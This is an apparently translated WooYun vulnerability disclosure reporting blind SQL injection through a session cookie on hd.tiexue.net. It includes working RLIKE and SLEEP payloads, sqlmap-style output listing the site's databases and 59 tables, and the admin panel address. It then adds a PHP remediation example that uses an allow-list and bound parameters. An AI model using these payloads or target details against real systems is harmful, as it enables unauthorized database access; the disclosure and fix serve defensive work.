WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
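2015-06-09: Details reported to the vendor; awaiting vendor handling
2015-06-11: Vendor confirmed; details disclosed to the vendor only
2015-06-21: Details disclosed to core white hats and experts in related fields
2015-07-01: Details disclosed to regular white hats
2015-07-11: Details disclosed to intern white hats
2015-07-26: Details disclosed to the public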
This is a "fix only the spot that gets pointed out" kind of hole; I hope the vendor takes it seriously this time.

GET / HTTP/1.1
Cookie: TTtuangou_tFrcLX_sid=1; TTtuangou_tFrcLX_loginref=http%3A%2F%2Fhd.tiexue.net%2F
X-Requested-With: XMLHttpRequest
Referer: http://hd.tiexue.net/
Host: hd.tiexue.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

Pages like these are affected as well:
/activity_1.html
/admin.php
/reserve_1.html
/view-136.html
---
Parameter: TTtuangou_tFrcLX_sid (Cookie)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: TTtuangou_tFrcLX_sid=1' RLIKE (SELECT (CASE WHEN (2866=2866) THEN 1 ELSE 0x28 END)) AND 'EZwI'='EZwI; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: TTtuangou_tFrcLX_sid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xksz) AND 'gANi'='gANi; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/
---
web application technology: Nginx, PHP 5.4.7
back-end DBMS: MySQL 5.0.12
current user: '[email protected]'
available databases [3]:
[*] information_schema
[*] test
[*] txhddata

Database: txhddata
[59 tables]
+--------------------------------------+
| cenwor_system_failedlogins           |
| cenwor_system_log                    |
| cenwor_system_memberfields           |
| cenwor_system_members                |
| cenwor_system_onlinetime             |
| cenwor_system_report                 |
| cenwor_system_robot                  |
| cenwor_system_robot_ip               |
| cenwor_system_robot_log              |
| cenwor_system_role                   |
| cenwor_system_role_action            |
| cenwor_system_role_module            |
| cenwor_system_sessions               |
| cenwor_tttuangou_activity            |
| cenwor_tttuangou_activity_user       |
| cenwor_tttuangou_address             |
| cenwor_tttuangou_api_apps            |
| cenwor_tttuangou_api_protocol        |
| cenwor_tttuangou_api_session         |
| cenwor_tttuangou_article             |
| cenwor_tttuangou_attrs               |
| cenwor_tttuangou_attrs_cat           |
| cenwor_tttuangou_attrs_order         |
| cenwor_tttuangou_catalog             |
| cenwor_tttuangou_city                |
| cenwor_tttuangou_city_place          |
| cenwor_tttuangou_comments            |
| cenwor_tttuangou_express             |
| cenwor_tttuangou_express_area        |
| cenwor_tttuangou_express_cdp         |
| cenwor_tttuangou_express_corp        |
| cenwor_tttuangou_express_printer_log |
| cenwor_tttuangou_finder              |
| cenwor_tttuangou_links               |
| cenwor_tttuangou_metas               |
| cenwor_tttuangou_order               |
| cenwor_tttuangou_order_clog          |
| cenwor_tttuangou_paylog              |
| cenwor_tttuangou_payment             |
| cenwor_tttuangou_prize_phone         |
| cenwor_tttuangou_prize_ticket        |
| cenwor_tttuangou_prize_ticket_win    |
| cenwor_tttuangou_product             |
| cenwor_tttuangou_push_log            |
| cenwor_tttuangou_push_queue          |
| cenwor_tttuangou_push_template       |
| cenwor_tttuangou_question            |
| cenwor_tttuangou_recharge_card       |
| cenwor_tttuangou_recharge_order      |
| cenwor_tttuangou_regions             |
| cenwor_tttuangou_reports             |
| cenwor_tttuangou_seller              |
| cenwor_tttuangou_service             |
| cenwor_tttuangou_subscribe           |
| cenwor_tttuangou_ticket              |
| cenwor_tttuangou_uploads             |
| cenwor_tttuangou_usermoney           |
| cenwor_tttuangou_usermsg             |
| cenwor_tttuangou_zlog                |
+--------------------------------------+

Admin panel address: http://hd.tiexue.net/admin.php
~~~~~~~~·
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-06-11 12:23
Many thanks to 路人甲; we are fixing it promptly.
None yet
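
The report shows the same cookie, TTtuangou_tFrcLX_sid, being injectable on several pages, which is why patching one page at a time does not close it. The following is an added example, not TTtuangou code and not part of the original report, of fixing the cookie lookup once in a shared function with a format allow-list plus a bound parameter. The column names, the 32-hex session id format, the function names and the SQLite stand-in database are assumptions; only the table name and the tested cookie value come from the report.

```php
<?php
// Added example, not TTtuangou code. Column names and the 32-hex sid format
// are assumptions; only the table name comes from the report.

// Constructed in-memory stand-in for the MySQL database, so this runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cenwor_system_sessions (sid TEXT PRIMARY KEY, uid INTEGER)');
$db->exec("INSERT INTO cenwor_system_sessions VALUES ('0123456789abcdef0123456789abcdef', 7)");

// Bound parameter only: the cookie travels as data, never as SQL text.
// On MySQL, consider also disabling PDO::ATTR_EMULATE_PREPARES.
function lookup_session_bound_only(PDO $db, $cookieSid)
{
    $stmt = $db->prepare('SELECT uid FROM cenwor_system_sessions WHERE sid = ?');
    $stmt->execute(array($cookieSid));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int) $row['uid'];
}

// Shared entry point for every page (/, /admin.php, /view-136.html, ...):
// allow-list the format first, then run the bound query.
function lookup_session(PDO $db, $cookieSid)
{
    // Rejects non-strings (e.g. array-style cookies) and anything not 32 hex chars.
    if (!is_string($cookieSid) || !preg_match('/\A[0-9a-f]{32}\z/', $cookieSid)) {
        return null;
    }
    return lookup_session_bound_only($db, $cookieSid);
}

// Constructed inputs; the third is the cookie value listed in the report.
$samples = array(
    'valid sid'          => '0123456789abcdef0123456789abcdef',
    'unknown sid'        => 'ffffffffffffffffffffffffffffffff',
    'value from report'  => "1' RLIKE (SELECT (CASE WHEN (2866=2866) THEN 1 ELSE 0x28 END)) AND 'EZwI'='EZwI",
    'array-style cookie' => array('x'),
);
foreach ($samples as $label => $sid) {
    printf("%-20s => %s\n", $label, var_export(lookup_session($db, $sid), true));
}

// Even without the format check, binding keeps the quote characters inert:
// the value is compared as one literal string and matches no session row.
printf("%-20s => %s\n", 'bound only, report',
    var_export(lookup_session_bound_only($db, $samples['value from report']), true));
```

Only the valid session id resolves to a user id; every other input, including the cookie value from the report, returns NULL on all pages that go through the shared function.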